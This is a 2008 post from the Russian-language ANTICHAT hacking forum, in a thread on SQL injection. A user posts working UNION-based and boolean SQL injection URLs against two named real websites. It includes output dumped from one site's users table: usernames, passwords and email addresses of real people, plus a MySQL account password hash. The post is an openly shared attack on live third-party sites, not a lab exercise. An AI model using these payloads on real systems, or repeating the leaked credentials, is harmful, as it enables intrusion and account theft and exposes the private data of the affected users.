SQL Инъекции — ANTICHAT Forum

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

28.07.2008, 11:54

MaSTeR GэN

Участник форума

Регистрация: 23.05.2008

Сообщений: 121

Провел на форуме:
305110

Репутация: 133

Отправить сообщение для MaSTeR GэN с помощью ICQ

fat-cat.co.uk

Код:

http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,id,username,password,email),3,4,5,6,7+FROM+users%20where%20id=2/*

Таблица users:

Код:

2iwantiwantiwantSeiji25xdl@tedra.net
3alex_teagundamalex_tea@r107.co.uk
......................................................................
......................................................................
1442chuppethxq92EAA932chuppeth@gmail.com
1443FemyanaehoowngIPouCm641lerik66@mymail-in.net

хеш текушева пользователя mysql.user и вывод file_priv

Код:

http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,file_priv,user,password),3,4,5,6,7+from+mysql.user where user=left(user(),locate(0x40,user())-1)/

file_priv нет

Код:

Nfatcat*B4DE6388421C75A631A6BADDCC27DAEE58D0122A

sublackwell.co.uk

Код:

http://www.sublackwell.co.uk/gallery.php?id=2+and+substring(version(),1,1)=5--

Mysql 5 версии таблиц интересных не нашел (